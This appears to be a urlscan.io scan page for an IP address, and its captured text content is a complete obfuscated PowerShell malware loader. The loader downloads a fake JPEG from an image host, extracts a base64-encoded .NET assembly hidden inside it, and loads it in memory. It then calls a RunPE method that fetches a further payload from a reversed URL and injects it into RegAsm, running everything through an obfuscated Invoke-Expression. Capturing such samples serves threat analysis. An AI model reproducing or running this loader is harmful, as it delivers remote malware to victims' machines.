41.216.183.13 Open in urlscan Pro
41.216.183.13  Public Scan

Form analysis
0 forms found in the DOM

Text Content

('Xn6link = '+'20xhttps://uploaddeimagens.com.br/images/004/805/740/original/vbs.jpg?171958273920x; Xn6webClient = New-Object System.Net.WebClient; try { Xn6d'+'ownloa'+'dedDat'+'a = Xn6web'+'Client.D'+'ownloadData(Xn6link) } catch {'+' Write-Host 20xFailed To'+' download data from Xn6link20x -ForegroundColor Red; exit }; if (Xn6downlo'+'adedData -ne Xn6null) { Xn6imageText = [System.Text.Encoding]::U'+'TF8.GetString(Xn6downloadedData); Xn6startFlag = 20x<<B'+'ASE64_START>>20x; Xn6endFlag = 20x<<BASE64_END>>2'+'0x'+'; Xn6startIndex = Xn6imageText.IndexOf(Xn6startFlag); Xn6endIndex = Xn6imageText.IndexOf(Xn6endFlag); if (Xn6startIndex -ge 0 -and Xn6endIndex -gt Xn6startI'+'ndex) { Xn6startIndex += Xn6startFlag.Leng'+'th; Xn6base64Le'+'ngth = Xn6endInd'+'ex - Xn6startIndex; Xn6base64Command '+'= Xn6imageText.Substring(Xn6startIn'+'dex'+', Xn6base64Length); Xn6commandB'+'yt'+'es = [System.Convert]::FromBase64String(Xn6base64Command); Xn6loadedAssemb'+'ly = [System.Reflection.Assembly]::Load(Xn'+'6commandBytes); Xn6type = Xn6loaded'+'Assem'+'bl'+'y.GetType(20xRunPE.Home20x); Xn6method = Xn'+'6type.G'+'etMethod(20xVAI20x).Invoke(Xn6null, [object[]]'+' '+'(20xtxt.dhh/22199/61.532.59.32//:ptth20x , 20xdesati'+'v'+'ado20x , 20xdesativado20x , 20xdes'+'ativado20x,'+'20xRegAsm20x,20x20x)) } }').rEPlace('Xn6','$').rEPlace('20x',[STRING][ChAR]39)| &( $env:comSPEC[4,15,25]-Join'')